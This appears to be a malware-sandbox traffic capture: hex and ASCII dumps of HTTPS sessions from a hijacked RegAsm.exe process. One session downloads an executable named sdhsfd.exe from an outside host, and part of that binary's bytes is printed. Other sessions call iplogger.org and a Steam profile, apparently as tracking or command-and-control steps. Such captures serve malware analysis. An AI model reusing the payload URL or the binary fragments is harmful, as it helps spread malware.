                                                                                                                                                                                                                                        2024-09-21 12:48:12 UTC16384INData Raw: 0f 1f 44 00 00 e8 5b c1 05 00 49 89 13 48 8b 50 08 49 89 53 08 48 8b 50 10 49 89 53 10 44 0f 11 38 48 c7 40 10 00 00 00 00 0f b6 59 09 48 8b 51 10 48 8b 44 24 28 48 89 d1 e8 a7 e5 ff ff 48 85 db 74 2a 48 8b 4c 24 30 48 8b 51 28 84 02 83 3d 60 8a 58 01 00 74 10 e8 e9 c0 05 00 49 89 1b 48 8b 72 10 49 89 73 08 48 89 5a 10 eb 05 48 8b 4c 24 30 0f b6 51 08 f6 c2 04 75 16 48 8d 05 99 c1 a8 00 bb 15 00 00 00 e8 99 8d 02 00 48 8b 4c 24 30 0f b6 41 08 83 e0 fb 88 41 08 48 83 c4 18 5d c3 48 ff c1 90 48 39 f1 0f 87 f4 fe ff ff 0f b7 78 52 48 0f af f9 48 01 d7 eb 10 44 0f b7 40 52 4e 8d 04 07 4d 8d 40 f8 49 8b 38 48 85 ff 74 d1 45 31 c0 eb 08 42 c6 04 07 00 49 ff c0 49 83 f8 08 72 f2 66 90 eb d4 44 0f b7 40 52 4d 8d 04 38 4d 8d 40 f8 49 8b 38 48 85 ff 0f 84 5b fe ff
                                                                                                                                                                                                                                        Data Ascii: D[IHPISHPISD8H@YHQHD$(HHt*HL$0HQ(=`XtIHrIsHZHL$0QuHHL$0AAH]HH9xRHHD@RNM@I8HtE1BIIrfD@RM8M@I8H[
                                                                                                                                                                                                                                        2024-09-21 12:48:12 UTC1024INData Raw: cc cc cc cc cc 55 48 89 e5 48 83 ec 20 48 39 d9 74 58 80 3d 9c 4a 58 01 00 74 38 48 8b 50 08 48 85 d2 74 2f 48 89 44 24 30 48 89 5c 24 38 48 89 4c 24 40 48 89 c7 48 89 d8 48 89 cb 48 89 d1 e8 e1 14 00 00 48 8b 44 24 30 48 8b 4c 24 40 48 8b 5c 24 38 48 8b 10 48 89 d8 48 89 cb 48 89 d1 e8 61 8e 05 00 48 83 c4 20 5d c3 48 83 c4 20 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 48 89 e5 48 83 ec 20 48 8b 48 08 48 89 c7 48 89 d8 31 db e8 87 14 00 00 48 83 c4 20 5d c3 cc 55 48 89 e5 48 83 ec 20 48 8b 50 08 48 89 c7 48 89 d8 48 89 cb 48 89 d1 e8 63 14 00 00 48 83 c4 20 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 48 89 e5 48 83 ec 20 48 89 74 24 50 80 3d bc 49 58 01 00 74 40 48 85 c0 74
                                                                                                                                                                                                                                        Data Ascii: UHH H9tX=JXt8HPHt/HD$0H\$8HL$@HHHHHD$0HL$@H\$8HHHHaH ]H ]UHH HHHH1H ]UHH HPHHHHcH ]UHH Ht$P=IXt@Ht


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        6192.168.2.949731162.241.61.2184437504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:11 UTC197OUTGET /sdhsfd.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: nerv.com.pe
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:48:11 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:11 GMT
                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                        Last-Modified: Fri, 20 Sep 2024 21:15:05 GMT
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Content-Length: 222112
                                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                                        2024-09-21 12:48:11 UTC7943INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 54 e5 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 0a 03 00 00 08 00 00 00 00 00 00 ee 28 03 00 00 20 00 00 00 40 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 03 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELTf( @@ `
                                                                                                                                                                                                                                        2024-09-21 12:48:11 UTC8000INData Raw: 62 ef fb e9 33 23 45 c9 f5 b2 08 e1 66 c6 e0 60 5a 48 e1 b1 79 f5 3c 9c ba 3c da 39 5f 75 05 af bb a2 dc ae 15 19 b6 d4 d0 b8 48 e3 70 2d c1 cc 07 c1 aa 91 35 bb 71 08 fc 31 84 ac c8 0f 63 25 be e6 90 14 44 98 c3 ed 9d 36 15 70 94 1b a6 2c 85 41 ba 4b c3 9d 5f d2 83 a6 0c 99 eb de f1 da 6d 29 ec 62 1b fe 69 e6 97 ab 52 6a 4b 3a 0c 8e d0 e2 be d1 54 39 13 bd 8b 85 a3 d9 1b 36 aa 96 71 be fb 65 c0 df 52 61 73 4b e6 d6 9e ba 16 7f 94 22 1b a4 f0 43 8b 0b b3 ea f4 30 7c 1a 99 7e 7e eb 87 91 f3 c0 ec ff 9d 19 10 b5 fd c3 f7 f4 f4 aa 02 f2 95 78 d3 51 ef 49 6d a3 46 11 b9 62 8a d1 06 7d f5 31 82 3d 58 f7 09 b6 38 47 e5 da 80 ca 28 3b cd 8d 42 65 84 6f 4e 8f b8 b7 8a e1 15 cf 94 d1 e1 84 23 67 8b 5b 39 af 43 d3 fc e8 9a ed 21 01 15 c8 f4 62 42 99 64 38 69 80 10
                                                                                                                                                                                                                                        Data Ascii: b3#Ef`ZHy<<9_uHp-5q1c%D6p,AK_m)biRjK:T96qeRasK"C0|~~xQImFb}1=X8G(;BeoN#g[9C!bBd8i
                                                                                                                                                                                                                                        2024-09-21 12:48:11 UTC8000INData Raw: 89 19 d5 7c da 9e ff 76 53 c3 2f 3a 35 47 2b b4 d2 8c 9f cd c7 f6 f9 17 20 a6 ad 03 c4 a2 10 c2 8c ad 70 05 c5 a8 b4 7d 30 9b 8d 36 28 88 3f 1c 95 fb f6 9e 67 fc 11 18 e7 65 55 d3 a5 53 03 f7 40 5f 6e 55 50 cc 4e 40 4d d8 f8 f3 e2 35 b8 44 6f d0 1a 46 2a dd d0 d2 c1 5e f5 65 67 0c 88 5a 58 f7 a8 68 98 20 cb c9 e2 ca a6 75 70 3d 80 b3 6e 84 58 a2 23 46 e0 26 7c 84 86 f2 b0 b7 15 4c 5c eb 40 24 1e 96 dc 51 5e 96 1d 63 f4 84 d4 19 5b 19 bb 46 ec 49 ac 48 c9 19 62 bf d6 9c 13 9d 5d 94 7d 94 7e d0 e0 15 a7 3a 68 24 bb 95 bf df 25 dc 7b f8 2e 3a 4a 0b 9b 38 ec b2 a7 62 ab d0 47 12 2b 41 79 7d 57 96 73 af 23 20 8d b3 18 49 ab 0f 5a e2 bf 97 65 3b d9 f5 a0 ed e6 cb 59 c5 43 ed aa 6e f3 81 5f c9 55 dc 88 9c ca 59 b0 4a 7d 9c 67 22 61 cb d6 b9 18 ef c4 84 f5 f6 e3
                                                                                                                                                                                                                                        Data Ascii: |vS/:5G+ p}06(?geUS@_nUPN@M5DoF*^egZXh up=nX#F&|L\@$Q^c[FIHb]}~:h$%{.:J8bG+Ay}Ws# IZe;YCn_UYJ}g"a
                                                                                                                                                                                                                                        2024-09-21 12:48:12 UTC8000INData Raw: cf c7 13 11 b5 6b ad 52 6d 32 4f e8 b7 de 2c b5 6e c0 82 41 d6 ba d7 f0 7a ca 04 94 c4 9f aa f1 4e 77 4d 9d c0 3c 3a 8f 7c 04 bb e8 d1 c5 57 53 d9 2c e7 1b 59 bf 2a 0c 13 26 e7 06 59 d2 bc 82 69 9a 6e 8a 16 ea 85 d3 f7 5d 09 a4 8e 72 a6 a8 2a 46 9b 56 96 5c 11 a9 f9 b9 02 66 d7 07 0a 8b 4c d3 5a 7f be 58 e7 4e 0b 55 09 a2 49 8e eb b2 08 97 08 96 a1 c0 8d 50 95 00 7f fb 7c d0 c2 09 82 ea 8e 67 46 24 f6 a0 d1 4b df 28 12 50 65 c0 a7 10 d8 13 19 1c 67 83 36 02 e9 0b b1 ee 7e 28 18 4a 62 8b ec 6e a3 13 27 10 9b 26 2d bd 53 77 04 24 36 40 3e a4 db 8c f5 e8 5a 0d a9 3c 93 a7 7d 47 d3 9e 1a 22 b5 bf 25 12 13 57 62 39 8f 06 57 a4 66 52 84 ce 70 fc 04 bf 3d a7 ce 18 45 9b 0a c4 dd 23 cc e5 08 31 85 78 28 dd ee c2 e7 b3 73 d9 6f 7f 4b ec d3 a0 18 35 18 78 06 99 64
                                                                                                                                                                                                                                        Data Ascii: kRm2O,nAzNwM<:|WS,Y*&Yin]r*FV\fLZXNUIP|gF$K(Peg6~(Jbn'&-Sw$6@>Z<}G"%Wb9WfRp=E#1x(soK5xd
                                                                                                                                                                                                                                        2024-09-21 12:48:12 UTC8000INData Raw: 3a f3 7a db 8f 2f d7 2c 05 ab 3a b1 bb 35 6a 7a ee 2e ed 6d c6 82 c6 4e ab 5c f0 42 6f 04 e4 e4 60 2b 00 d5 bf 66 6c 26 f1 46 be 08 e9 9e 0c 60 37 81 6e 97 08 8c b3 79 ed bc 32 4f 44 81 19 31 05 d7 7c d7 9a 3d 52 06 14 74 ba 75 f3 d6 14 39 a3 a2 66 e1 4d e3 b9 3d b3 b4 69 26 9b d0 81 3e f8 b3 e0 15 2c eb ba 1e 00 f5 74 58 b0 b8 19 da 18 88 49 84 7f 5c 57 62 37 f3 7e f5 ca 6c 29 a2 08 44 1b c1 5a ad 6e 5e 5a 64 96 82 da 0d fe 4d 52 d9 f6 5e e5 cd 9a 0d b4 cb fd ec 39 86 ab 32 e3 bd 14 28 ff 43 48 8d d5 8f 19 ce 37 48 b5 9e 10 1e 5e 29 19 45 fa b6 f8 4c 1a 96 ad 3d f4 3c 5c a1 10 9b a1 79 d4 02 36 6c 6f 3f 5a 26 71 23 b6 0c 08 3c 00 7a 6e b8 d4 d9 14 c4 e0 7c e4 2d ec 9a 12 6d fa 25 15 76 5c b8 7d 22 23 10 8f d4 27 3d 6f 05 41 fa ab 77 95 48 a5 4c 2b f0 03
                                                                                                                                                                                                                                        Data Ascii: :z/,:5jz.mN\Bo`+fl&F`7ny2OD1|=Rtu9fM=i&>,tXI\Wb7~l)DZn^ZdMR^92(CH7H^)EL=<\y6lo?Z&q#<zn|-m%v\}"#'=oAwHL+
                                                                                                                                                                                                                                        2024-09-21 12:48:12 UTC8000INData Raw: 64 21 3d 73 df 1c f5 28 d9 b8 7c 0f 1d 1f 5f a2 03 3a 49 8a 36 2d 02 09 76 de 9b 1b 39 1e 12 57 94 30 dd 5f 9c 95 17 c0 d8 d0 79 47 d4 9b 85 b6 30 1c 41 04 6a 84 43 d6 e5 f7 07 18 e2 b4 a5 a9 73 1b 13 70 cc 08 44 07 2d a5 ba 49 18 e7 83 2c 18 7a 9e c9 69 0e d1 b7 e3 ab 00 f6 ca 79 d7 90 e6 e9 89 26 89 85 55 e6 d1 c4 3c aa 29 f9 b4 6d 16 4e e1 c3 59 cc e1 bc bd bf 68 ec 78 54 e5 95 2d 04 1f 2a 90 2b d2 9f 0d f6 9d 8f 10 0f dd 24 de d9 64 99 91 ae 90 42 3e 15 39 7e 08 97 98 2f 6e f6 89 47 a1 59 9c 9b 85 72 d1 0f 88 2f 02 24 19 af eb 16 6d 93 ad 4e af ad e8 15 bf 6b 33 0b 2e 1f e0 7d e8 92 20 ce ef 05 79 0e 03 ec 06 30 64 d4 59 4d c4 01 06 3a 3b 6f 4d 01 53 41 73 04 18 e8 88 5d c1 0b 49 83 04 a7 23 66 2f 7d bb 9b 6d 1a 61 06 67 b3 91 17 97 12 5e ff df 28 90
                                                                                                                                                                                                                                        Data Ascii: d!=s(|_:I6-v9W0_yG0AjCspD-I,ziy&U<)mNYhxT-*+$dB>9~/nGYr/$mNk3.} y0dYM:;oMSAs]I#f/}mag^(
                                                                                                                                                                                                                                        2024-09-21 12:48:12 UTC8000INData Raw: 89 ea 72 ff c0 79 23 13 8c 7a 47 af 50 d9 8e 0c b0 70 e5 15 a1 59 3e 84 65 ef c8 8b be 19 b7 c3 cf 21 63 a4 6c f3 9e 1b 91 35 e5 71 72 b2 a8 df c7 67 9b cc 10 99 e4 d0 53 b7 53 75 50 fa d0 d1 c1 1f 1d 69 2d 5f 6e 2a c0 e8 bc 78 93 64 3c ee 97 d1 ac 35 79 a0 d5 f7 10 0e f6 35 50 f1 a8 d5 4e c8 a9 30 59 f7 b1 37 e8 41 dc 35 05 b0 33 3f 97 ab 06 37 93 a9 e4 9e ac 3c fe 78 5b b7 cd b7 d0 bf 2a 13 0a 65 40 d9 c1 b0 e9 82 69 06 ce 50 1f 6b 7a 7f b2 bb 6a 10 bd c3 22 00 f3 00 14 c6 c1 c9 a2 9a 5a 81 c2 61 22 04 5f 20 49 2d 31 02 a7 13 d6 2a 8d 0b b9 b1 78 a6 30 d7 2d ca 62 bb 97 72 f1 e7 3e bf 47 91 d1 42 e9 9c 94 30 fa 8d 5b 30 bf 5d 5e f4 af 6a ab 9b 99 84 87 ea c8 2d b4 8b 65 75 35 19 52 bc d3 c3 bf f7 c6 24 e5 a3 b4 e8 26 f6 79 c7 d5 c6 ca 2e e1 b7 ba c7 de
                                                                                                                                                                                                                                        Data Ascii: ry#zGPpY>e!cl5qrgSSuPi-_n*xd<5y5PN0Y7A53?7<x[*e@iPkzj"Za"_ I-1*x0-br>GB0[0]^j-eu5R$&y.
                                                                                                                                                                                                                                        2024-09-21 12:48:12 UTC8000INData Raw: 9d 7f b7 8e 3e a0 e7 34 ba 5d 1b 25 85 d0 5c b1 0b eb 8b cc c5 10 37 10 5e 25 a3 b1 5d 0c 68 04 8c 57 11 3a a1 6e e7 9b 14 38 c7 85 cf 0d df c3 a7 53 94 70 9c 9f 29 5a 7a 94 27 02 37 70 c7 26 ed 50 08 75 70 6d bc a0 02 0f 66 71 48 f4 06 cb 6d 16 3f 8d 2c ae 32 87 92 c8 1a d9 d3 d2 0f 89 38 43 21 54 b1 35 ff f3 66 aa 2f 54 14 3c b3 61 27 2d 9f fa 1a d5 47 e3 27 7c 9a 74 6a 3a bf 0e 99 68 7b 3e a9 23 15 16 9c d6 1b 40 b6 17 00 18 d0 a2 1d 27 6b 52 fe c2 7f 52 fc 76 92 85 d9 4d de 84 0f ea 9d ff 09 78 03 20 1f 7d 5c 06 a8 1c 8a fd fe 7b d2 07 b5 e2 d4 b4 27 1f 65 b9 aa 98 87 99 5c c4 c3 22 ce 15 40 5b 6b 1f 76 cb 35 43 0b 3d 40 83 15 45 ab ca 6f bb 8c 22 3b fa 4e 20 94 9b 6d ff 90 e5 c2 5a 4d 04 e0 1f e1 7f d6 b7 a8 ee 18 50 2c eb b9 b3 06 32 0c d0 d2 ba 8b
                                                                                                                                                                                                                                        Data Ascii: >4]%\7^%]hW:n8Sp)Zz'7p&PupmfqHm?,28C!T5f/T<a'-G'|tj:h{>#@'kRRvMx }\{'e\"@[kv5C=@Eo";N mZMP,2
                                                                                                                                                                                                                                        2024-09-21 12:48:12 UTC8000INData Raw: 16 a7 2b 08 41 67 3f cc 3d 04 24 79 42 fc 27 be 2a 1a d9 e3 02 80 8f b6 1e 37 d9 1c bc dc 62 4c a5 8c 3f 7a 71 7c f6 77 10 cc 5e 2b b4 87 4b b5 8c f5 60 62 b2 d6 4f d6 5b 3f b4 4f dd 77 ae b7 63 b8 91 82 12 51 d5 48 0a 11 c7 f9 9b a5 95 ba 52 39 26 fc ea 59 da 29 3a ba 95 a9 88 84 c0 4a 1d bf 23 29 8b 37 02 65 50 0d 61 ab 77 53 3d 70 a0 ac d2 cc 9b d2 25 a7 76 c9 5f 8f 02 06 14 12 53 9a 19 52 ab f0 9a 3c a8 5f 75 7d 2b 1e 55 52 fa 9c aa c5 c1 24 06 b9 c5 19 02 b3 95 43 7a e1 1a eb 1a dc 85 17 ab 94 de c8 3f 27 29 9a 44 56 4c fb 8c 02 1d 00 50 cf 83 77 68 a3 a4 93 2d a3 2d 93 37 37 66 77 16 e1 08 db 30 c9 d5 c6 78 ce 39 bc 12 1f a8 bc 0d 8a c2 fd 78 09 63 4c 99 dc 67 0a f1 d5 61 e7 ef 33 96 a0 4f 9a 96 72 e8 26 47 7e 48 aa 3b 67 5d 34 ae 68 73 98 38 74 c4
                                                                                                                                                                                                                                        Data Ascii: +Ag?=$yB'*7bL?zq|w^+K`bO[?OwcQHR9&Y):J#)7ePawS=p%v_SR<_u}+UR$Cz?')DVLPwh--77fw0x9xcLga3Or&G~H;g]4hs8t
                                                                                                                                                                                                                                        2024-09-21 12:48:12 UTC8000INData Raw: a4 da 6e b2 ac 71 6e 2d ab b2 ad 47 be f6 35 26 87 88 b3 da 2a 37 c4 7a b6 ec 4c fc 8f 1e c9 8e 64 49 14 8b 6d a4 9e 88 4c 7e cc ca c5 fb 9f 78 24 5f 7e a2 be e0 24 4a 3e 03 71 63 3b 26 7d da ce 99 32 de 7a d8 b9 65 63 fc 3d 59 84 9e 9c 63 8f fa f2 27 64 29 6b b1 6d a9 31 af b0 31 ea e1 f9 26 bd 9d e3 2c ef 67 10 73 9d 5f 75 5f 5b 7b 49 ae 9e c8 58 f5 ae 13 e2 cb 7e 17 0a 56 09 2e d6 c4 60 b3 4f 1c d5 98 77 87 52 9c 7e 54 a7 01 8d 4a 90 98 8a 5b e8 0f 06 68 4f b1 e5 23 da 80 57 2a 16 6a 93 42 57 d4 d7 ec 4d 0b d2 2b 56 24 22 f9 1a 5e 16 df 80 4b 20 9a 81 b9 98 e4 ee cc 04 9d 38 f4 46 9a 84 6e 07 af df e5 8e 23 3c a3 f8 00 13 91 c3 37 d4 5c 11 8c 11 68 a7 69 ad 62 40 14 36 cd 03 f6 24 f6 fe 06 6e b1 ca dd b1 2c f5 cd aa 18 83 2c 7e 45 ae 35 53 c3 2c 98 fa
                                                                                                                                                                                                                                        Data Ascii: nqn-G5&*7zLdImL~x$_~$J>qc;&}2zec=Yc'd)km11&,gs_u_[{IX~V.`OwR~TJ[hO#W*jBWM+V$"^K 8Fn#<7\hib@6$n,,~E5S,


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        7192.168.2.949735172.67.74.1614437504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:32 UTC196OUTGET /1nhuM4.js HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: iplogger.org
                                                                                                                                                                                                                                        2024-09-21 12:48:32 UTC995INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:32 GMT
                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        memory: 0.43090057373046875
                                                                                                                                                                                                                                        expires: Sat, 21 Sep 2024 12:48:32 +0000
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                                                        Set-Cookie: 40589004137263905=2; expires=Sun, 21 Sep 2025 12:48:32 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                        Set-Cookie: clhf03028ja=8.46.123.33; expires=Sun, 21 Sep 2025 12:48:32 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fn2L1Vf58Yni3XzVN0zgjlUYDR%2BDhgRbGBzE2nvk2jMQnU3wSE%2BdFFkhoB1ES8e7EUdedUwsY2Yt%2FtRPi%2FgVsg0xpTwSUBOOCZ4fm7yON7Ak5hWQKKSktg4MIUFyZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8c6a2b89ee111998-EWR
                                                                                                                                                                                                                                        2024-09-21 12:48:32 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                                                                                                                                                                        2024-09-21 12:48:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        8192.168.2.94973623.197.127.214437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:40 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:48:41 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:41 GMT
                                                                                                                                                                                                                                        Content-Length: 34740
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: sessionid=528bef74ad1442f574ff38c8; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                        2024-09-21 12:48:41 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                        2024-09-21 12:48:41 UTC10062INData Raw: 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69
                                                                                                                                                                                                                                        Data Ascii: destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><di
                                                                                                                                                                                                                                        2024-09-21 12:48:41 UTC10164INData Raw: 6d 6d 75 6e 69 74 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45
                                                                                                                                                                                                                                        Data Ascii: mmunity.akamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.akamai.steamstatic.com\/&quot;,&quot;PUBLIC_SHARE


